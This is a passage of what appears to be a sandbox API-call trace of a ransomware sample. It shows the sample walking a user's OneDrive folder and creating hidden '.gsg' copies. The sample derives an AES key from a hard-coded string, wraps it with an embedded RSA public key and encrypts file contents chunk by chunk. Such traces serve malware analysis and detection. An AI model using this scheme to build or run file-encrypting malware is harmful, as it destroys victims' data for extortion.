dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0276.555] GetFileType (hFile=0x5d4c) returned 0x1 [0276.555] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0276.557] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0276.557] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hu\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa4c8 [0276.557] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0276.557] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0276.557] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0276.557] GetLastError () returned 0x0 [0276.557] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hu\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\hu\\filesync.localizedresources.dll.mui")) returned 0x20 [0276.560] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hu\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0276.560] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hu\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\hu\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0276.561] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hu\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\hu\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0276.562] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hu\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0276.563] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f2a0e0) returned 1 [0276.565] CryptCreateHash (in: hProv=0x2f2a0e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0276.565] lstrlenA (lpString="xnendTQFJsKkHaCKRLwqcHvuzMlQm") returned 29 [0276.565] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb710, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0276.565] CryptDeriveKey (in: hProv=0x2f2a0e0, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fb308) returned 1 [0276.565] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0276.565] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0276.565] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f2bc80) returned 1 [0276.566] CryptImportPublicKeyInfo (in: hCryptProv=0x2f2bc80, dwCertEncodingType=0x1, pInfo=0x2f34da0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f34dd0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f34dd8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fb908) returned 1 [0276.566] CryptEncrypt (in: hKey=0x2fb908, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0276.566] CryptEncrypt (in: hKey=0x2fb908, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f2bd08*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f2bd08*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0276.566] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f2bd08*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f2bd08*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0276.567] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.574] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.574] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.580] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.580] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.580] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.580] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.580] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.580] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.581] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.581] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.581] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.581] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.581] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.581] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.582] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.582] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.582] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.582] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.582] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.582] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.582] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.582] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.582] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.582] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.582] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.582] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.582] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.583] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.583] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.583] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.583] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.583] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.583] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.583] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.583] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.583] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.583] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.583] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.584] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.584] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.584] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.584] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.584] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.584] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.584] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.584] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.584] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.585] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.585] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.585] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.585] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.585] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.585] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.585] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.585] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.585] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.585] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.585] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.585] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.586] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.586] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.586] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.586] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.586] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.586] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.586] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.586] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.586] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.586] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.586] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.586] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.587] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.587] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.587] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, 